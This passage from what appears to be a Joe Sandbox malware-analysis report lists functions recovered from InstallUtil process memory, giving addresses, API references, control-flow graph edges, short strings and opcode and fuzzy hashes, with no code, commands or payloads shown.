                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3d8d47ef233019010613ede693be51de490a8a79df3eea283381dcf29105232e
                                                                        • Instruction ID: e3b39fda7f9e3346b78ef48ad54440270b2711b3d5853577daaec4dbc46b4316
                                                                        • Opcode Fuzzy Hash: 3d8d47ef233019010613ede693be51de490a8a79df3eea283381dcf29105232e
                                                                        • Instruction Fuzzy Hash: A521E3B5D00248DFDB10CF99D584ADEBFF5EB48310F14801AE958A7350D374A945CFA0
                                                                        Function 02686788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1076 2686788-268681c DuplicateHandle 1077 268681e-2686824 1076->1077 1078 2686825-2686842 1076->1078 1077->1078
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0268680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: b7f77f5e4306a3cff7adc313507235596cdcff501e8aa56cc47b1cce1df356e6
                                                                        • Instruction ID: 8f8b6cb554444706ffcc2e6766284916f6e23a66cf856c5cbaafa83e2944e7a6
                                                                        • Opcode Fuzzy Hash: b7f77f5e4306a3cff7adc313507235596cdcff501e8aa56cc47b1cce1df356e6
                                                                        • Instruction Fuzzy Hash: 6A21C4B5D002589FDB10DF9AD984ADEBFF8FB48320F14841AE958A7350D374A944CFA5
                                                                        Function 078C55C0 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1081 78c55c0-78c5641 1090 78c564a-78c5658 1081->1090 1091 78c5643-78c5648 1081->1091 1092 78c565b-78c56d6 call 78c1b00 1090->1092 1091->1092 1165 78c56d9 call 78c5a88 1092->1165 1166 78c56d9 call 78c5a54 1092->1166 1102 78c56df-78c56e6 1103 78c56ef-78c572c 1102->1103 1104 78c56e8-78c56ed 1102->1104 1105 78c572f-78c579c 1103->1105 1104->1105 1117 78c58ad-78c590b 1105->1117 1118 78c57a2-78c58ab call 78c5308 call 78c52a0 call 78c0910 1105->1118 1135 78c5912-78c593a 1117->1135 1118->1135 1143 78c593c-78c5974 1135->1143 1144 78c5976-78c599b 1135->1144 1143->1144 1152 78c599d 1144->1152 1153 78c59a6 1144->1153 1152->1153 1156 78c59a7 1153->1156 1156->1156 1165->1102 1166->1102
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Pl^q
                                                                        • API String ID: 0-2831078282
                                                                        • Opcode ID: 961ec3d9d04ae32ad86283abf0bed564f0858a635d657c47dc729c2df4904e2a
                                                                        • Instruction ID: 9d31c7131b3e024301da58fb1265366d44c37b7bd48d2e2ccacb1522413f69ae
                                                                        • Opcode Fuzzy Hash: 961ec3d9d04ae32ad86283abf0bed564f0858a635d657c47dc729c2df4904e2a
                                                                        • Instruction Fuzzy Hash: D0D1EF74B512189FCB48EFA8D994E9DBBB2FF89700F108458E415AB365CA75EC42CB81
                                                                        Function 0268C1F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0268C25E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: fd4fabbb9219e619dd083fbc320769e76a8cf85636ed47adbd647134cd5311aa
                                                                        • Instruction ID: 23763ca4e745102574bfcc89411440bb2c7bd807beea27942dea3efc9bd2cbc7
                                                                        • Opcode Fuzzy Hash: fd4fabbb9219e619dd083fbc320769e76a8cf85636ed47adbd647134cd5311aa
                                                                        • Instruction Fuzzy Hash: 501110B5C002498FCB14DF9AD584ADEFBF4EB88724F10852AD428A7250C379A545CFA5
                                                                        Function 078C1970 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        • Opcode ID: bbd8b24abce135c018c2865dad7f84d6a944caaacb92e5b10ed9f396a84992c5
                                                                        • Instruction ID: 84484c31954bd310fd8764cf76d9ddade657457fbe94812b18c59e14a8302a42
                                                                        • Opcode Fuzzy Hash: bbd8b24abce135c018c2865dad7f84d6a944caaacb92e5b10ed9f396a84992c5
                                                                        • Instruction Fuzzy Hash: F1A1B271700205DFD719DF64D998A2A7BB7EF89300B1580ADE10ACF7A2DA36DC46CB91
                                                                        Function 078C55B0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Pl^q
                                                                        • API String ID: 0-2831078282
                                                                        • Opcode ID: 82ee51a4cd06a1e5129031cd019025cd4f2c6a0268ec88091496c67ecbf511cd
                                                                        • Instruction ID: 9f45f898be88bc0581e4ad67105d0ab463d074e66aecf40c6e9aea7aa04f6ec5
                                                                        • Opcode Fuzzy Hash: 82ee51a4cd06a1e5129031cd019025cd4f2c6a0268ec88091496c67ecbf511cd
                                                                        • Instruction Fuzzy Hash: ADB11074B11218DFCB48EFA8D994E9EBBB2FF89700F108458E415AB365DA75EC42CB50
                                                                        Function 078C0AA8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: d78c7ebd9535a899c5b0a76b828fcc28213769812f58d234f9184cbd1214c398
                                                                        • Instruction ID: 6c16d4cfd07758907917d11b64349761ea75e9c7fa4173b224eb9ffdaf20b1e6
                                                                        • Opcode Fuzzy Hash: d78c7ebd9535a899c5b0a76b828fcc28213769812f58d234f9184cbd1214c398
                                                                        • Instruction Fuzzy Hash: DE413034B106188FCB48EB68C854A6EB7B6EFC9710F10852DD416EB394CF749D46CB91
                                                                        Function 078C27E0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 13b5b0ba8ca29dadf8024f86525a9da1ac841de777a4b54f3c5739fd60347f70
                                                                        • Instruction ID: c6c8c4f6f193311def8ec0ab9d1795e50322e2cfc14fe36b242be3098877b7a6
                                                                        • Opcode Fuzzy Hash: 13b5b0ba8ca29dadf8024f86525a9da1ac841de777a4b54f3c5739fd60347f70
                                                                        • Instruction Fuzzy Hash: 974148B17406149FD308DB68C959F6A7BAAEF89710F1045A9E106CF3A6CE35EC42C7A1
                                                                        Function 078C2808 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 457f7dd6249cb478f9eed94dba9db58efdd2e2bded3c6dbc59a6ad0f80460dcd
                                                                        • Instruction ID: 9997ca0e06b2ba1a2c66d33d9b1d4f2b2aac11a505249e95365741f3fffb5564
                                                                        • Opcode Fuzzy Hash: 457f7dd6249cb478f9eed94dba9db58efdd2e2bded3c6dbc59a6ad0f80460dcd
                                                                        • Instruction Fuzzy Hash: 1C3148717406149FD348EB69C998F2A77EABBC8704F104568E20ACF3A5DE76EC42C791
                                                                        Function 078C0A97 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        • Opcode ID: 86f9c928df3c4c7ca764c59e89a010ae9f916d1f6ea4cd28908e296a4125977d
                                                                        • Instruction ID: 2966708a2caed26f9142119baebed0f5d9c6e67100f88e4beb534d94522b622d
                                                                        • Opcode Fuzzy Hash: 86f9c928df3c4c7ca764c59e89a010ae9f916d1f6ea4cd28908e296a4125977d
                                                                        • Instruction Fuzzy Hash: A321C370B102199BDB48EBA88C58A7EB7BBEFC5750F10402EE416EB394CE748C468791
                                                                        Function 078C9091 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: xbq
                                                                        • API String ID: 0-73991425
                                                                        • Opcode ID: d871e086f535e222528d84ea7e5b2da13009b423c4486726bd1d301928b08849
                                                                        • Instruction ID: 118760d4f52734d2cface326a84929b3f9e980da2d9f2cff745c29ca07221c7a
                                                                        • Opcode Fuzzy Hash: d871e086f535e222528d84ea7e5b2da13009b423c4486726bd1d301928b08849
                                                                        • Instruction Fuzzy Hash: 98F030757401149FDB04DB18DA41A69BBE5EF89314F158199E509AF362C771FC068F90
                                                                        Function 078C3840 Relevance: .7, Instructions: 655COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d336269fff83467e9c65d5f19bb2a51244a16304b75ecb9f0da5b4d77005796
                                                                        • Instruction ID: 4c74cffefafc4056a722a7f6df12bf0d90008280a3bd3528782c03c3053fadd7
                                                                        • Opcode Fuzzy Hash: 7d336269fff83467e9c65d5f19bb2a51244a16304b75ecb9f0da5b4d77005796
                                                                        • Instruction Fuzzy Hash: EE425C75A00219CFCB54DF68C984E99BBB2FF89300F1185D9E509AB261DB31ED96CF81
                                                                        Function 078C9594 Relevance: .5, Instructions: 510COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23b96109874028706e1e6cb5809c93d1e693bb9127ecc677bb580cdabe4a40a6
                                                                        • Instruction ID: 32c897b17699037b9c8902182da9b3cda42edde6ec773134dc5563d69911c801
                                                                        • Opcode Fuzzy Hash: 23b96109874028706e1e6cb5809c93d1e693bb9127ecc677bb580cdabe4a40a6
                                                                        • Instruction Fuzzy Hash: 2DE026712402029BE704BEB468641E67BD7CBD6310F04886BD959D3690CC3198018BCA
                                                                        Function 078C0CE8 Relevance: .4, Instructions: 437COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15ce6ead2ac02ffc187bb364d903e6197bbc950e737b5ce17dc0d98c1fe75ace
                                                                        • Instruction ID: 5647704652c6f145c728fe911ed78fe9203626d920d38df31227f6fe606ffe78
                                                                        • Opcode Fuzzy Hash: 15ce6ead2ac02ffc187bb364d903e6197bbc950e737b5ce17dc0d98c1fe75ace
                                                                        • Instruction Fuzzy Hash: E1122A74A10219CFCB54EF64C994A9DBBB2BF89300F5085A8E449AB355DF34ED86CF80
                                                                        Function 078C48C8 Relevance: .3, Instructions: 324COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9901ffc9e62e8b3f19149c2f37210e67f817534c367cc752024a0a7793cfab96
                                                                        • Instruction ID: 89d939bdfd88d68abb18f0873f5e540a9cab64473997826ec27590d93b6e9ba6
                                                                        • Opcode Fuzzy Hash: 9901ffc9e62e8b3f19149c2f37210e67f817534c367cc752024a0a7793cfab96
                                                                        • Instruction Fuzzy Hash: C8C1BEB0B006599FCB58EF64D860BAE7BF2AF85300F14816DE4159B390DB75DD86CB81
                                                                        Function 078C5A54 Relevance: .3, Instructions: 293COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0080592a4f94ff1c5e9c1bb11f3a058e437c4b700b1d9d163db947d5aca3ef8c
                                                                        • Instruction ID: 922fb7a31356bc9e33da202e813c58bcd327b40d1bfc5e980f1189e04995a6ef
                                                                        • Opcode Fuzzy Hash: 0080592a4f94ff1c5e9c1bb11f3a058e437c4b700b1d9d163db947d5aca3ef8c
                                                                        • Instruction Fuzzy Hash: 07B17B747006188FCB58EB78C8949AE7BF2AF8A700B10465DE4169F3A4DF74ED42CB91
                                                                        Function 078C5A88 Relevance: .3, Instructions: 256COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fa969d74954bbd0319a243f0926f5332048e67efc2143984dfe7b90704ca2d
                                                                        • Instruction ID: 651bc6fdc5d6e0273558ac3b65ff965dc7ff18c7e6e87b46729d84b7fcc6a42c
                                                                        • Opcode Fuzzy Hash: 80fa969d74954bbd0319a243f0926f5332048e67efc2143984dfe7b90704ca2d
                                                                        • Instruction Fuzzy Hash: 6CA137347006188FCB48EF68C89496E7BF2AF89700F10865DE5169B3A4EF75ED46CB91
                                                                        Function 078C0CD8 Relevance: .2, Instructions: 243COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 325bb3d0758e84cfa0f373427db8b4621d7e29dbc9e8ca4abdfc02fae0e81b3f
                                                                        • Instruction ID: 7d422ff13ba0b01c25d315e9debc4d85481a64de031271bfe940ce1263663c08
                                                                        • Opcode Fuzzy Hash: 325bb3d0758e84cfa0f373427db8b4621d7e29dbc9e8ca4abdfc02fae0e81b3f
                                                                        • Instruction Fuzzy Hash: 1EA1FA74A002198FDB54DF64CD98BA9BBB2BF89300F5081A9E549AB365DF34ED85CF40
                                                                        Function 078C1CA8 Relevance: .2, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 035d96e6614a7982a4f0b7075e7a2021d17eb265114d3c5560e072af0ad20017
                                                                        • Instruction ID: 3e8819b9748e79c905132cc89c9ace852ae11451c89c4764ad3093822a6febc9
                                                                        • Opcode Fuzzy Hash: 035d96e6614a7982a4f0b7075e7a2021d17eb265114d3c5560e072af0ad20017
                                                                        • Instruction Fuzzy Hash: A2913E75B10218DFCB48DF68D898A6D7BB5BF89710F1480A9E516DB3A2CB34DC42CB90
                                                                        Function 078C920B Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39fe0c2b28e5b0cb87e0dda9bfcbeafa21fd4e3c733f5c55d12c3c7f2c674f60
                                                                        • Instruction ID: 517bb5cc2f6d678df9e84a47299cd655c9f962c43d54c4c7ce2e91909bbc5f31
                                                                        • Opcode Fuzzy Hash: 39fe0c2b28e5b0cb87e0dda9bfcbeafa21fd4e3c733f5c55d12c3c7f2c674f60
                                                                        • Instruction Fuzzy Hash: 1381E0B4A21229EFCB14CF98D980EADB7B6FF98314F154199E905AB362D731EC41CB41
                                                                        Function 078C49E0 Relevance: .2, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 235ce2dc373183d57f26a581b6015716d3bee1c0c09718fddcd1c39b867d3f7e
                                                                        • Instruction ID: 9c50a17dd457d95eb6aab59fa72be724a2ea20368501f79bdf55f6a3f9388cc4
                                                                        • Opcode Fuzzy Hash: 235ce2dc373183d57f26a581b6015716d3bee1c0c09718fddcd1c39b867d3f7e
                                                                        • Instruction Fuzzy Hash: 44518FB0B006499FCB49EB64D864BAE7BF2AF89200F14412DE415AB790DB759D82CB91
                                                                        Function 078C1C98 Relevance: .2, Instructions: 170COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4930cdcc8b414be7be98b1e3e8d97b49f83afaa4c993ae43d1628aa9dd017aba
                                                                        • Instruction ID: a8f3395116e34ab2eaba36358ec43e1377d3fdea13b028845baa277a9efe3871
                                                                        • Opcode Fuzzy Hash: 4930cdcc8b414be7be98b1e3e8d97b49f83afaa4c993ae43d1628aa9dd017aba
                                                                        • Instruction Fuzzy Hash: 5C611B74B106149FCB48DF68D898AADB7B5FF49600F1480A9E516DB361CB34EC42CB90
                                                                        Function 078C9584 Relevance: .1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a66b2adc61e8f5c42e7e440526700500c738d07c9f60e692e967d53d6cc9e672
                                                                        • Instruction ID: dab24813efe0dc8876af268c218bced07f40ff4802eb8b4ca51d6272ddfac96d
                                                                        • Opcode Fuzzy Hash: a66b2adc61e8f5c42e7e440526700500c738d07c9f60e692e967d53d6cc9e672
                                                                        • Instruction Fuzzy Hash: 6041A071B002059FC704DB69C854AAEBBF6FF89310B2985AAE509DB361DB31ED01CB90
                                                                        Function 078CA098 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d7cdaaf6cdf3b9b5ede791f80ca38b7ee91568ac1b97ee763273fc83694d674
                                                                        • Instruction ID: f471ca3b0055c380a85a48aa7bc348183de9195b657c13f377981381cf07748b
                                                                        • Opcode Fuzzy Hash: 8d7cdaaf6cdf3b9b5ede791f80ca38b7ee91568ac1b97ee763273fc83694d674
                                                                        • Instruction Fuzzy Hash: DF41AC71B00719CFCB64DFB8D94429ABBF2EF84350B04896ED15AC7B94DA30E945CB82
                                                                        Function 078CA610 Relevance: .1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17d439b5da374b071dd48d1292d67769251956d1e3e14782068793665e301dcb
                                                                        • Instruction ID: 1ccede247d8c08f8709f4a1485df66218b59ac22c7fa8193aa64a98989b1e2c2
                                                                        • Opcode Fuzzy Hash: 17d439b5da374b071dd48d1292d67769251956d1e3e14782068793665e301dcb
                                                                        • Instruction Fuzzy Hash: 9141F3B5B002099FCB15DF68D905AAEBBB6EF88710F10856AE605DB290DB31E906CB51
                                                                        Function 078CA4C8 Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4b2c939c499d0b9749332443b1844b95d812b93ae8562b035da9b0ffa2af597
                                                                        • Instruction ID: d707c0fcb22fecfa9c2bb3d320931dafef5bf8769b9ab5769d7121fe4d5a3ec6
                                                                        • Opcode Fuzzy Hash: b4b2c939c499d0b9749332443b1844b95d812b93ae8562b035da9b0ffa2af597
                                                                        • Instruction Fuzzy Hash: 774139B1A007499FCB25CFA9C944A6ABBF1BF98304F14C55DD582D7A51DB30E904CF52
                                                                        Function 078C4D51 Relevance: .1, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09bcbadcdad8ad2ae7dc2d8439813c3f106e58035adf93cb74ea874793a7d066
                                                                        • Instruction ID: 1447aa127c89580101b2b85ce920f5d26051b944ab63a0a279a4a93252940e3a
                                                                        • Opcode Fuzzy Hash: 09bcbadcdad8ad2ae7dc2d8439813c3f106e58035adf93cb74ea874793a7d066
                                                                        • Instruction Fuzzy Hash: A031A374B102588FCB49EF74D8549AEBBB6EFCA700B10815AE416DB351DF349902CBE1
                                                                        Function 078C1FC8 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00cbdd69ff227119d3040c034bb44fbce8966eedfec3fba4752e787e9b3404cb
                                                                        • Instruction ID: 572a92f577679e86c9fa24ab812aed5aea6e8425ef445558dc0191825a90acf5
                                                                        • Opcode Fuzzy Hash: 00cbdd69ff227119d3040c034bb44fbce8966eedfec3fba4752e787e9b3404cb
                                                                        • Instruction Fuzzy Hash: 1C311975A001199FDF04DFA8D854AEEB7B6FF88350F10806AE905BB3A0DB759D45CBA0
                                                                        Function 078C4D68 Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46c591fd8e51b274b639bdb265cffcee5258835a12edb232bf5eee5f502d5c98
                                                                        • Instruction ID: f8ef4bb3195584f2fd840ab1ef6a86d79c3f3a1cd98936917e08312ef23fe261
                                                                        • Opcode Fuzzy Hash: 46c591fd8e51b274b639bdb265cffcee5258835a12edb232bf5eee5f502d5c98
                                                                        • Instruction Fuzzy Hash: 40316134B105188FCB48EF68D994A6EBBB6EFC9700F108159E516DB354DF749902CBD1
                                                                        Function 078C9B02 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e46f888a6661c59a7cecefcace6f6c513842e677442bdb120a8b54607d3898c4
